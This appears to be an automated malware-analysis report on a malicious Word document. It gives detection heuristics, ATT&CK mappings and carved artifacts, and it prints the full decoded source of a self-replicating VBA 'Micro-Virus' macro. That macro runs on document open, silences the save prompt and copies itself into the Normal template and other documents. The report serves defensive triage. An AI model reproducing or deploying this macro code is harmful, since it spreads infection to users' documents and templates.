MALICIOUS
252
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1566.001 Spearphishing Attachment
The sample is a malicious Office document containing VBA macros, specifically a Document_Open macro designed to infect the Normal template. It also embeds a PDF file which itself has suspicious static findings, including being an image-only lure. The macro's intent is to ensure persistence and potentially facilitate further malicious activity, aligning with spearphishing attachment tactics.
Heuristics 8
-
Office EPRINT stream contains EMF object high OLE_EPRINT_EMF_OBJECTOLE ObjectPool contains an EPRINT stream with EMF data. This is rare in normal documents and is related Office object-delivery evidence when paired with exploit payload anomalies, but the malformed graphics record required for exact CVE attribution is not proven by this rule alone.
-
ClamAV: Doc.Macro.MicroVirus-6097260-0 critical CLAMAV_DETECTIONClamAV detected this file as malware: Doc.Macro.MicroVirus-6097260-0
-
Secondary embedded PDF body has suspicious static findings critical POLYGLOT_CHILD_PDF_STATIC_TRIAGEA valid PDF body was found at a nonzero offset inside another container and its carved contents matched PDF exploit or lure heuristics. This catches polyglots where the top-level magic routes to ZIP/OLE while a PDF reader or downstream parser opens the hidden PDF payload.
-
VBA macros detected medium 2 related findings OLE_VBA_MACROSDocument contains VBA macro code
-
VBA macro-virus self-replication / AV tampering critical OLE_VBA_MACRO_VIRUS_REPLICATIONVBA macro programmatically rewrites VBA project code through the VBE object model (CodeModule/VBComponents InsertLines/DeleteLines/AddFromString or OrganizerCopy) to copy itself into the global template and other open documents, and/or disables Office macro-virus protection (Options.VirusProtection = False). This is the defining behavior of the W97M document macro-virus family — self-replicating code with no benign document use, independent of any AV signature.Matched line in script
.DeleteLines 1, .CountOfLines -
Document_Open macro low OLE_VBA_DOCOPENDocument_Open macroMatched line in script
Sub Document_Open() -
PDF paints image(s) but contains no text operators info PDF_IMAGE_ONLY_LUREPDF has 1 image XObject(s) and the content stream contains no text-emitting operators (BT/ET, Tj, TJ, ', ") in either raw bytes or decompressed streams — this is the screenshot-as-PDF pattern used to bypass text-based scanners and to deliver instructions purely through rendered pixels. It is informational unless paired with invisible links or risky URI context.
-
Embedded URL info EMBEDDED_URLOne or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.URL http://www.iec.ch In document text (OLE body)
Extracted artifacts 6
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 1668 bytes |
SHA-256: 23c05dfe1843063484b69ac83a3c05ea521b15b6090dfe4b78d733dc465a3849 |
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
'Micro-Virus
Sub Document_Open()
On Error Resume Next
Application.DisplayStatusBar = False
'MsgBox "DisplayStatusBar = False"
Options.SaveNormalPrompt = False
Ourcode = ThisDocument.VBProject.VBComponents(1).CodeModule.Lines(1, 100)
'MsgBox "Ourcode"
'get normal
Set Host = NormalTemplate.VBProject.VBComponents(1).CodeModule
'if normal, set active;
If ThisDocument = NormalTemplate Then
' MsgBox "ThisDocument = NormalTemplate"
Set Host = ActiveDocument.VBProject.VBComponents(1).CodeModule
' MsgBox "Set Host = ActiveDocument"
End If
With Host
If .Lines(1, 1) <> "'Micro-Virus" Then
.DeleteLines 1, .CountOfLines
' MsgBox "DeleteLines 1, .CountOfLines"
.InsertLines 1, Ourcode
.ReplaceLine 2, "Sub Document_Close()"
' MsgBox "ReplaceLine 2,Close()"
If ThisDocument = NormalTemplate Then
' MsgBox "ThisDocument = NormalTemplate"
.ReplaceLine 2, "Sub Document_Open()"
' MsgBox "ReplaceLine 2,Open()"
ActiveDocument.SaveAs ActiveDocument.FullName
' MsgBox "ActiveDocument.SaveAs"
End If
End If
End With
End Sub
|
|||
icc_00_off0000404c.icc |
pdf-icc-profile | PDF ICC profile at offset 0x404C | 1980 bytes |
SHA-256: 67effac6c9ae32284244ac0202a96a3c054abf1c7ff658d4841d9849f5cb5d18 |
|||
icc_01_off0000452c.icc |
pdf-icc-profile | PDF ICC profile at offset 0x452C | 1960 bytes |
SHA-256: 283e482d9b10db98fb7df2f6ef4bdf4ddf8de5a07d2c7530cc361ec4b29ed39a |
|||
icc_02_off000049e4.icc |
pdf-icc-profile | PDF ICC profile at offset 0x49E4 | 3144 bytes |
SHA-256: 2b3aa1645779a9e634744faf9b01e9102b0c9b88fd6deced7934df86b949af7e |
|||
font_00_sfnt_off0000582d.bin |
pdf-font-stream | PDF embedded font (sfnt) at offset 0x582D | 10404 bytes |
SHA-256: 65b5318ef77d07ff1c3abc2cc7c3f88a6a231a19c96e200e451aefe449cb14fb |
|||
polyglot_child_pdf_off000203ea.pdf |
polyglot-child-pdf | Secondary PDF body inside ole container at offset 0x203EA | 241174 bytes |
SHA-256: 04a184c8caaf7452208c89005c2d981f3a6871edbce33cd713ea1afcb3032ee2 |
|||
Open this report in the interactive analyzer, or submit your own file for analysis.